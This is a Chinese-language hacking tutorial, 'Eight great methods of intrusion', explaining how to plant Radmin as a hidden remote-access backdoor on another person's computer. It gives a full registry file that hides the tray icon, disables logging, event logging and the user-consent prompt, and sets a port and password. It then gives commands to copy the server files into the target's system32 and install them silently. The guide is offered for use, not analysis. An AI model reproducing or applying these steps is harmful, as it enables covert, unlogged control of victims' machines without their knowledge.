入侵八大法

入侵八大法详细介绍

我们平常所用的远程共用一个桌面的服务软件有DameWareNT,VNC,Pcanywhere,Remoteadministrator等。DameWare我感觉已经被淘汰了，它的缺点太多，例如要依赖IPC$，日志记录等等。Pcanywhere我没有研究过。VNC最大的特点是跨平台，但缺点是隐藏图标的问题，我不会编程，当然无法去除图标，还有就是VNC功能很少。radmin就不同了，它的特色有：速度快隐藏图标，COPY文件，telnet等功能。安装也及其简单：
首先要在自己的机子上安装，在设置完端口，密码，隐藏图标后，从注册表导出

HKEY_LOCAL_MACHINE\SYSTEM\RAdmin起名为radmin.reg

内容大概如下：

WindowsRegistryEditorVersion5.00
[HKEY_LOCAL_MACHINE\SYSTEM\RAdmin]
[HKEY_LOCAL_MACHINE\SYSTEM\RAdmin\v2.0]
[HKEY_LOCAL_MACHINE\SYSTEM\RAdmin\v2.0\Server]
[HKEY_LOCAL_MACHINE\SYSTEM\RAdmin\v2.0\Server\iplist]
[HKEY_LOCAL_MACHINE\SYSTEM\RAdmin\v2.0\Server\Parameters]
"Port"=hex:64,19,00,00
"Timeout"=hex:0a,00,00,00
"EnableLogFile"=hex:00,00,00,00
"LogFilePath"="c:\\logfile.txt"
"FilterIp"=hex:00,00,00,00
"DisableTrayIcon"=hex:01,00,00,00
"AutoAllow"=hex:00,00,00,00
"AskUser"=hex:00,00,00,00
"EnableEventLog"=hex:00,00,00,00
"NTAuthEnabled"=hex:00,00,00,00
"Parameter"=hex:c7,04,0d,72,74,b5,cb,03,f6,46,8e,ee,64,52,72,7b

解释一下"DisableTrayIcon"=hex:01,00,00,00里的01表示隐藏图标，改成00，图标就会显示。"Port"=hex:当然是端口，这里是6500。"Parameter"=hex:是密码。

其他的就不用管了。

现在我们将
AdmDll.dll
raddrv.dll
r_server.exe
radmin.reg
复制到对方的c:\winnt\system32下。
然后在对方机器上运行：
regedit/sradmin.reg
r_server/install/silence